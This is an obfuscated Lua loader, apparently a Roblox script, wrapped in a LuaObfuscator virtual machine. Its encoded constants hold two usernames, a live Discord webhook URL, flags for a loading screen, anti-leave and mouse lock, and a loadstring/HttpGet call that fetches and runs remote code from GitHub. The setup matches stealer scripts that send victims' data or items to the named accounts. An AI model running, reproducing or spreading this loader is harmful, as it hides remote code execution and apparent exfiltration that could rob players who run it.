--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v68=0;while true do if (v68==0) then v19=v0(v3(v30,1,1));return "";end end else local v69=0;local v70;while true do if (v69==0) then v70=v2(v0(v30,16));if v19 then local v96=v5(v70,v19);v19=nil;return v96;else return v70;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v71=0;local v72;while true do if (v71==(0 -0)) then v72=(v31/((5 -3)^(v32-(1 + 0))))%((3 -1)^(((v33-1) -(v32-(1 + 0))) + (878 -(282 + 595)))) ;return v72-(v72%(2 -1)) ;end end else local v73=(621 -(555 + 64))^(v32-(1 -0)) ;return (((v31%(v73 + v73))>=v73) and (932 -((3731 -2874) + 74))) or ((685 -(32 + 85)) -(367 + 197 + 4)) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + 1 + 1 );v18=v18 + (959 -(892 + 65)) ;return (v36 * 256) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + (7 -4) );v18=v18 + (6 -2) ;return (v40 * (30800116 -14022900)) + (v39 * (65886 -(87 + 263))) + (v38 * ((320 + 116) -(67 + 113))) + v37 ;end local function v24()local v41=0 -0 ;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v41==(2 + 0)) then v46=v20(v43,21,123 -(162 -70) );v47=((v20(v43,984 -(802 + 150) )==(2 -1)) and  -(1 -0)) or (1 + 0) ;v41=3;end if (v41==(1000 -((2401 -(998 + 488)) + 82))) then if (v46==0) then if (v45==(0 -(438 -(145 + 293)))) then return v47 * (0 + 0) ;else v46=1 -0 ;v44=0;end elseif (v46==(3234 -(1069 + 118))) then return ((v45==(0 -0)) and (v47 * ((1 -(0 + 0))/(0 + 0)))) or (v47 * NaN) ;end return v8(v47,v46-(1817 -794) ) * (v44 + (v45/((2 + 0)^((691 + 152) -((1140 -(201 + 571)) + (1561 -(116 + 1022))))))) ;end if (v41==(3 -2)) then v44=19 -(10 + 8) ;v45=(v20(v43,3 -2 ,462 -(416 + 26) ) * (2^32)) + v42 ;v41=2;end if ((0 -0)==v41) then v42=v23();v43=v23();v41=1 + (0 -0) ;end end end local function v25(v48)local v49;if  not v48 then v48=v23();if (v48==(0 + 0)) then return "";end end v49=v3(v16,v18,(v18 + v48) -(3 -2) );v18=v18 + v48 ;local v50={};for v65=3 -2 , #v49 do v50[v65]=v2(v1(v3(v49,v65,v65)));end return v6(v50);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0;local v52;local v53;local v54;local v55;local v56;local v57;while true do local v67=0 -0 ;while true do if (v67==1) then if (v51==(578 -(386 + 192))) then local v93=0;while true do if (v93~=(1207 -(696 + 510))) then else v54={};v51=1;break;end if (v93~=0) then else v52={};v53={};v93=1 -0 ;end end end if (v51~=2) then else for v97=1263 -(1091 + 171) ,v56 do local v98=0 + 0 ;local v99;local v100;local v101;while true do if (v98~=0) then else local v111=0;while true do if (v111~=1) then else v98=1;break;end if (v111==0) then v99=0 -0 ;v100=nil;v111=3 -2 ;end end end if (v98==1) then v101=nil;while true do if (v99==1) then if (v100==1) then v101=v21()~=(374 -(123 + 251)) ;elseif (v100==(9 -7)) then v101=v24();elseif (v100~=3) then else v101=v25();end v57[v97]=v101;break;end if ((698 -(208 + 490))==v99) then local v119=0;local v120;local v121;while true do if (v119~=(1 + 0)) then else while true do if (v120==0) then v121=0;while true do if (v121==(0 + 0)) then local v187=0;while true do if (v187==1) then v121=837 -(660 + 176) ;break;end if (0~=v187) then else local v190=0;while true do if (v190~=(1 + 0)) then else v187=203 -(14 + 188) ;break;end if (v190==0) then v100=v21();v101=nil;v190=1;end end end end end if (v121~=(676 -(534 + 141))) then else v99=1 + 0 ;break;end end break;end end break;end if (v119==(0 + 0)) then v120=0 + 0 ;v121=nil;v119=1;end end end end break;end end end v55[3]=v21();for v102=1 -0 ,v23() do local v103=0 -0 ;local v104;while true do if (v103==0) then v104=v21();if (v20(v104,1,2 -1 )==(0 + 0)) then local v114=0;local v115;local v116;local v117;while true do if (1==v114) then local v147=0 + 0 ;while true do if ((396 -(115 + 281))==v147) then v117={v22(),v22(),nil,nil};if (v115==(0 -0)) then local v181=0;local v182;local v183;local v184;while true do if ((868 -(550 + 317))==v181) then v184=nil;while true do if (1~=v182) then else while true do if (v183==(0 -0)) then v184=0 -0 ;while true do if (v184==(0 -0)) then v117[3]=v22();v117[4]=v22();break;end end break;end end break;end if (v182~=(285 -(134 + 151))) then else v183=0;v184=nil;v182=1666 -(970 + 695) ;end end break;end if (v181==(0 -0)) then v182=1990 -(582 + 1408) ;v183=nil;v181=3 -2 ;end end elseif (v115==(1 -0)) then v117[3]=v23();elseif (v115==2) then v117[3]=v23() -((7 -5)^16) ;elseif (v115~=3) then else local v191=0;local v192;local v193;while true do if ((1825 -(1195 + 629))==v191) then while true do if (v192==0) then v193=0;while true do if ((0 -0)==v193) then v117[244 -(187 + 54) ]=v23() -(2^16) ;v117[784 -(162 + 618) ]=v22();break;end end break;end end break;end if (v191==0) then v192=0;v193=nil;v191=1;end end end v147=1;end if (v147==(1 + 0)) then v114=2 + 0 ;break;end end end if (v114~=(3 -1)) then else if (v20(v116,1,1 -0 )==1) then v117[1 + 1 ]=v57[v117[1638 -(1373 + 263) ]];end if (v20(v116,2,1002 -(451 + 549) )==(1 + 0)) then v117[4 -1 ]=v57[v117[3]];end v114=3;end if (v114==(0 -0)) then local v148=0;while true do if (0==v148) then local v178=0;while true do if (v178==1) then v148=1;break;end if ((1384 -(746 + 638))==v178) then v115=v20(v104,1 + 1 ,3);v116=v20(v104,4,6);v178=1 -0 ;end end end if (v148==(342 -(218 + 123))) then v114=1582 -(1535 + 46) ;break;end end end if (v114==3) then if (v20(v116,3,3)==1) then v117[4]=v57[v117[4]];end v52[v102]=v117;break;end end end break;end end end v51=3 + 0 ;end break;end if (v67==(0 + 0)) then if (v51==1) then v55={v52,v53,nil,v54};v56=v23();v57={};v51=2;end if (v51~=(1 + 2)) then else local v95=0;while true do if (v95~=(0 -0)) then else for v112=1,v23() do v53[v112-1 ]=v28();end return v55;end end end v67=1468 -(899 + 568) ;end end end end local function v29(v58,v59,v60)local v61=0;local v62;local v63;local v64;while true do if (v61==0) then v62=v58[1];v63=v58[2];v61=1;end if (1==v61) then v64=v58[3];return function(...)local v77=v62;local v78=v63;local v79=v64;local v80=v27;local v81=1;local v82= -1;local v83={};local v84={...};local v85=v12("#",...) -1 ;local v86={};local v87={};for v91=0,v85 do if (v91>=v79) then v83[v91-v79 ]=v84[v91 + 1 ];else v87[v91]=v84[v91 + 1 ];end end local v88=(v85-v79) + 1 ;local v89;local v90;while true do local v92=0;while true do if (v92==1) then if (v90<=5) then if (v90<=2) then if (v90<=0) then v87[v89[2]]=v89[3]~=0 ;elseif (v90>1) then v87[v89[2]]=v89[3];else v87[v89[2]]();end elseif (v90<=3) then v60[v89[3]]=v87[v89[2]];elseif (v90==4) then v87[v89[2]][v89[3]]=v89[4];else v87[v89[2]]=v60[v89[3]];end elseif (v90<=8) then if (v90<=6) then v87[v89[2]]=v89[3];v81=v81 + 1 ;v89=v77[v81];v60[v89[3]]=v87[v89[2]];v81=v81 + 1 ;v89=v77[v81];v87[v89[2]]=v89[3];v81=v81 + 1 ;v89=v77[v81];v60[v89[3]]=v87[v89[2]];v81=v81 + 1 ;v89=v77[v81];v87[v89[2]]=v89[3];v81=v81 + 1 ;v89=v77[v81];v60[v89[3]]=v87[v89[2]];v81=v81 + 1 ;v89=v77[v81];v87[v89[2]]=v60[v89[3]];v81=v81 + 1 ;v89=v77[v81];v87[v89[2]][v89[3]]=v89[4];v81=v81 + 1 ;v89=v77[v81];v87[v89[2]]=v60[v89[3]];v81=v81 + 1 ;v89=v77[v81];v87[v89[2]][v89[3]]=v89[4];elseif (v90>7) then do return;end else local v159=v89[2];local v160,v161=v80(v87[v159](v13(v87,v159 + 1 ,v89[3])));v82=(v161 + v159) -1 ;local v162=0;for v176=v159,v82 do local v177=0;while true do if (v177==0) then v162=v162 + 1 ;v87[v176]=v160[v162];break;end end end end elseif (v90<=9) then local v131;local v132,v133;local v134;local v135;v87[v89[2]][v89[3]]=v89[4];v81=v81 + 1 ;v89=v77[v81];v87[v89[2]]=v60[v89[3]];v81=v81 + 1 ;v89=v77[v81];v87[v89[2]]=v60[v89[3]];v81=v81 + 1 ;v89=v77[v81];v135=v89[2];v134=v87[v89[3]];v87[v135 + 1 ]=v134;v87[v135]=v134[v89[4]];v81=v81 + 1 ;v89=v77[v81];v87[v89[2]]=v89[3];v81=v81 + 1 ;v89=v77[v81];v87[v89[2]]=v89[3]~=0 ;v81=v81 + 1 ;v89=v77[v81];v135=v89[2];v132,v133=v80(v87[v135](v13(v87,v135 + 1 ,v89[3])));v82=(v133 + v135) -1 ;v131=0;for v150=v135,v82 do v131=v131 + 1 ;v87[v150]=v132[v131];end v81=v81 + 1 ;v89=v77[v81];v135=v89[2];v87[v135]=v87[v135](v13(v87,v135 + 1 ,v82));v81=v81 + 1 ;v89=v77[v81];v87[v89[2]]();v81=v81 + 1 ;v89=v77[v81];do return;end elseif (v90==10) then local v163=0;local v164;while true do if (v163==0) then v164=v89[2];v87[v164]=v87[v164](v13(v87,v164 + 1 ,v82));break;end end else local v165=v89[2];local v166=v87[v89[3]];v87[v165 + 1 ]=v166;v87[v165]=v166[v89[4]];end v81=v81 + 1 ;break;end if (v92==0) then v89=v77[v81];v90=v89[1];v92=1;end end end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!0F3O0003083O00557365724E616D6503083O00416E67727934323903073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31353130393534352O32372O362O333639302F4368643464755337446F4D30592D644E63392O5A6B5135735146314D774E594C773863614C5F625A4F366563465179554B3072394C67536B2O433645716779327364776B03093O00557365724E616D6532030C3O004261626170726F333238363103023O005F47030D3O004C6F6164696E675363722O656E2O0103093O00416E74694C6561766503093O004D6F7573654C6F636B030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970747300153O0012063O00023O00124O00013O00124O00043O00124O00033O00124O00063O00124O00053O00124O00073O00304O0008000900124O00073O00304O000A00090012053O00073O0030093O000B000900124O000C3O00122O0001000D3O00202O00010001000E00122O0003000F6O000400016O000100049O0000026O000100016O00017O00",v9(),...);
